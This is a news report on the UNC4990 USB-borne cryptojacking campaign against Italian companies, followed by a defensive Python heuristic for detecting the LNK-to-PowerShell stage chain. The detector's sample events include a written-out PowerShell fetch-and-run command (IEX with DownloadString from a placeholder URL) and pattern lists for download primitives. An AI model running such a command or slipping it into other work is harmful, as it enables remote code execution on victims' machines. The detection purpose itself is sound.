Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware

31.01.2024


A financially motivated threat actor identified as UNC4990 is employing weaponized USB devices as an initial means of infecting organizations in Italy, according to a report from Mandiant, a subsidiary of Google. The targeted sectors encompass health, transportation, construction, and logistics.

Mandiant’s report, released on Tuesday, outlines the typical UNC4990 modus operandi, which involves widespread USB infections followed by the deployment of the EMPTYSPACE downloader. Throughout these operations, UNC4990 relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages. These stages are downloaded and decoded via PowerShell early in the execution chain.

Active since late 2020, UNC4990 is believed to operate out of Italy, evident from its extensive use of Italian infrastructure for command-and-control (C2) purposes. The ultimate goal of UNC4990 remains unclear, although there is a documented instance where an open-source cryptocurrency miner was deployed after months of beaconing activity.

Fortgale and Yoroi previously documented details of the campaign in early December 2023, with Fortgale referring to the threat actor as Nebula Broker. The infection initiates when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, triggering the execution of a PowerShell script responsible for downloading EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a remote server via an intermediate PowerShell script hosted on Vimeo.

Yoroi has identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python. These variants act as conduits for fetching next-stage payloads over HTTP from the C2 server, including a backdoor named QUIETBOARD.
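As an added example, not code from Mandiant's, Fortgale's or Yoroi's reporting, the following Python heuristic flags process-creation events that match the chain described above: PowerShell launched from Explorer (the LNK double-click), using a download/execute primitive against one of the third-party hosting sites the report names. Field names are Sysmon-style and the sample events are constructed for this example.

```python
"""Heuristic detection for the USB -> LNK -> PowerShell -> third-party-hosted
stage chain described in the article. Field names and events are constructed."""
import re

# Third-party sites the report names as hosts for encoded additional stages.
STAGE_HOSTS = ("vimeo.com", "github.com", "githubusercontent.com", "arstechnica.com")
# Generic PowerShell download/execute primitives (not campaign-specific).
DOWNLOAD_RE = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def host_matches(host, allowed):
    """True if host equals or is a subdomain of any entry in allowed."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in allowed)


def classify(event):
    """Return the reasons an event resembles the LNK -> PowerShell -> stage chain."""
    reasons = []
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons  # only PowerShell launches are of interest here
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer (shortcut/LNK launch pattern)")
    cmd = event.get("CommandLine", "")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download/execute primitive in command line")
    for host in URL_RE.findall(cmd):
        if host_matches(host, STAGE_HOSTS):
            reasons.append("stage fetched from third-party host " + host)
    return reasons


def detect(events):
    """Flag (RecordId, reasons) for events carrying at least two indicators."""
    flagged = []
    for e in events:
        reasons = classify(e)
        if len(reasons) >= 2:
            flagged.append((e["RecordId"], reasons))
    return flagged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; the URL is a placeholder, not a real IoC
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient)"
                    ".DownloadString('https://vimeo.com/EXAMPLE-PLACEHOLDER'))\""},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl https://github.com/org/repo/releases"},
]
```

Only record 1 is flagged: an Explorer-launched PowerShell running an administrative script (record 2) carries a single indicator and is left alone, which is the point of requiring two.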
